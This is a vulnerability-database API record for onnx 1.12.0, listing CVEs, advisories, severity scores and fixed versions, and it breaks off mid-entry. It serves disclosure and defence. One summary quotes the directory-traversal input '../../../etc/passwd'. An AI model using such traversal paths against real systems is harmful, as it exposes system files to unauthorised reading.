Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/30128?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/30128?format=api", "purl": "pkg:pypi/onnx@1.12.0", "type": "pypi", "namespace": "", "name": "onnx", "version": "1.12.0", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "1.21.0", "latest_non_vulnerable_version": "1.21.0", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/329544?format=api", "vulnerability_id": "VCID-1fsj-5v28-tbfj", "summary": "", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-34446.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-34446.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34446", "reference_id": "", "reference_type": "", "scores": [ { "value": "4e-05", "scoring_system": "epss", "scoring_elements": "0.00163", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34446" }, { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T14:10:29Z/" } ], "url": "https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb" }, { "reference_url": "https://github.com/onnx/onnx/security/advisories/GHSA-cmw6-hcpp-c6jp", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T14:10:29Z/" } ], "url": "https://github.com/onnx/onnx/security/advisories/GHSA-cmw6-hcpp-c6jp" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34446", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34446" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132607", "reference_id": "1132607", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132607" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2454371", "reference_id": "2454371", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2454371" }, { "reference_url": "https://github.com/advisories/GHSA-cmw6-hcpp-c6jp", "reference_id": "GHSA-cmw6-hcpp-c6jp", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cmw6-hcpp-c6jp" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48002?format=api", "purl": "pkg:pypi/onnx@1.21.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0" } ], "aliases": [ "CVE-2026-34446", "GHSA-cmw6-hcpp-c6jp" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1fsj-5v28-tbfj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/8697?format=api", "vulnerability_id": "VCID-4p7r-z14t-9uav", "summary": "Versions of the package onnx before 1.13.0 are vulnerable to Directory Traversal as the external_data field of the tensor proto can have a path to the file which is outside the model current directory or user-provided directory, for example \"../../../etc/passwd\"", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-25882", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.05827", "scoring_system": "epss", "scoring_elements": "0.90675", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-25882" }, { "reference_url": "https://gist.github.com/jnovikov/02a9aff9bf2188033e77bd91ff062856", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/" } ], "url": "https://gist.github.com/jnovikov/02a9aff9bf2188033e77bd91ff062856" }, { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/blob/96516aecd4c110b0ac57eba08ac236ebf7205728/onnx/checker.cc%23L129", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/" } ], "url": "https://github.com/onnx/onnx/blob/96516aecd4c110b0ac57eba08ac236ebf7205728/onnx/checker.cc%23L129" }, { "reference_url": "https://github.com/onnx/onnx/commit/f369b0e859024095d721f1d1612da5a8fa38988d", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/" } ], "url": "https://github.com/onnx/onnx/commit/f369b0e859024095d721f1d1612da5a8fa38988d" }, { "reference_url": "https://github.com/onnx/onnx/issues/3991", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/" } ], "url": "https://github.com/onnx/onnx/issues/3991" }, { "reference_url": "https://github.com/onnx/onnx/pull/4400", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/" } ], "url": "https://github.com/onnx/onnx/pull/4400" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2023-38.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2023-38.yaml" }, { "reference_url": "https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/" } ], "url": "https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25882", "reference_id": "CVE-2022-25882", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25882" }, { "reference_url": "https://github.com/advisories/GHSA-ffxj-547x-5j7c", "reference_id": "GHSA-ffxj-547x-5j7c", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-ffxj-547x-5j7c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/30129?format=api", "purl": "pkg:pypi/onnx@1.13.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1fsj-5v28-tbfj" }, { "vulnerability": "VCID-5319-x8g7-qbew" }, { "vulnerability": "VCID-acaz-q7jr-r3g9" }, { "vulnerability": "VCID-g8xb-18u2-6qbe" }, { "vulnerability": "VCID-gc3c-f7yt-nkc1" }, { "vulnerability": "VCID-hcza-pev8-vfh5" }, { "vulnerability": "VCID-hudf-3jt7-xkaf" }, { "vulnerability": "VCID-ssfy-y61v-mkfm" }, { "vulnerability": "VCID-zxjc-1tkz-ykfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.13.0" } ], "aliases": [ "CVE-2022-25882", "GHSA-ffxj-547x-5j7c", "PYSEC-2023-38" ], "risk_score": 0.1, "exploitability": "0.5", "weighted_severity": "0.1", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4p7r-z14t-9uav" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/9594?format=api", "vulnerability_id": "VCID-5319-x8g7-qbew", "summary": "Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, there is a symlink traversal vulnerability in external data loading allows reading files outside the model directory. This issue has been patched in version 1.21.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34447", "reference_id": "", "reference_type": "", "scores": [ { "value": "5e-05", "scoring_system": "epss", "scoring_elements": "0.00261", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34447" }, { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/security/advisories/GHSA-p433-9wv8-28xj", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-01T19:14:28Z/" } ], "url": "https://github.com/onnx/onnx/security/advisories/GHSA-p433-9wv8-28xj" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34447", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34447" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132608", "reference_id": "1132608", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132608" }, { "reference_url": "https://github.com/advisories/GHSA-p433-9wv8-28xj", "reference_id": "GHSA-p433-9wv8-28xj", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p433-9wv8-28xj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/48002?format=api", "purl": "pkg:pypi/onnx@1.21.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0" } ], "aliases": [ "CVE-2026-34447", "GHSA-p433-9wv8-28xj", "PYSEC-2026-104" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5319-x8g7-qbew" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/9069?format=api", "vulnerability_id": "VCID-acaz-q7jr-r3g9", "summary": "Versions of the package onnx before and including 1.15.0 are vulnerable to Directory Traversal as the external_data field of the tensor proto can have a path to the file which is outside the model current directory or user-provided directory. The vulnerability occurs as a bypass for the patch added for CVE-2022-25882.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27318", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00408", "scoring_system": "epss", "scoring_elements": "0.61435", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27318" }, { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/commit/66b7fb630903fdcf3e83b6b6d56d82e904264a20", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-14T15:31:21Z/" } ], "url": "https://github.com/onnx/onnx/commit/66b7fb630903fdcf3e83b6b6d56d82e904264a20" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2024-222.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2024-222.yaml" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY/", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-14T15:31:21Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY/" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL/", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-14T15:31:21Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL/" }, { "reference_url": "https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-08-14T15:31:21Z/" } ], "url": "https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27318", "reference_id": "CVE-2024-27318", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27318" }, { "reference_url": "https://github.com/advisories/GHSA-whh8-fjgc-qp73", "reference_id": "GHSA-whh8-fjgc-qp73", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-whh8-fjgc-qp73" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/39078?format=api", "purl": "pkg:pypi/onnx@1.16.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1fsj-5v28-tbfj" }, { "vulnerability": "VCID-5319-x8g7-qbew" }, { "vulnerability": "VCID-gc3c-f7yt-nkc1" }, { "vulnerability": "VCID-hcza-pev8-vfh5" }, { "vulnerability": "VCID-hudf-3jt7-xkaf" }, { "vulnerability": "VCID-ssfy-y61v-mkfm" }, { "vulnerability": "VCID-zxjc-1tkz-ykfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.16.0" } ], "aliases": [ "CVE-2024-27318", "GHSA-whh8-fjgc-qp73", "PYSEC-2024-222" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-acaz-q7jr-r3g9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/9068?format=api", "vulnerability_id": "VCID-g8xb-18u2-6qbe", "summary": "Versions of the package onnx before and including 1.15.0 are vulnerable to Out-of-bounds Read as the ONNX_ASSERT and ONNX_ASSERTM functions have an off by one string copy.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27319", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24802", "published_at": "2026-05-30T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27319" }, { "reference_url": "https://github.com/onnx/onnx", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/onnx/onnx" }, { "reference_url": "https://github.com/onnx/onnx/commit/08a399ba75a805b7813ab8936b91d0e274b08287", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-23T22:35:11Z/" } ], "url": "https://github.com/onnx/onnx/commit/08a399ba75a805b7813ab8936b91d0e274b08287" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2024-223.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2024-223.yaml" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY/", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-23T22:35:11Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY/" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL/", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-23T22:35:11Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL/" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27319", "reference_id": "CVE-2024-27319", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": 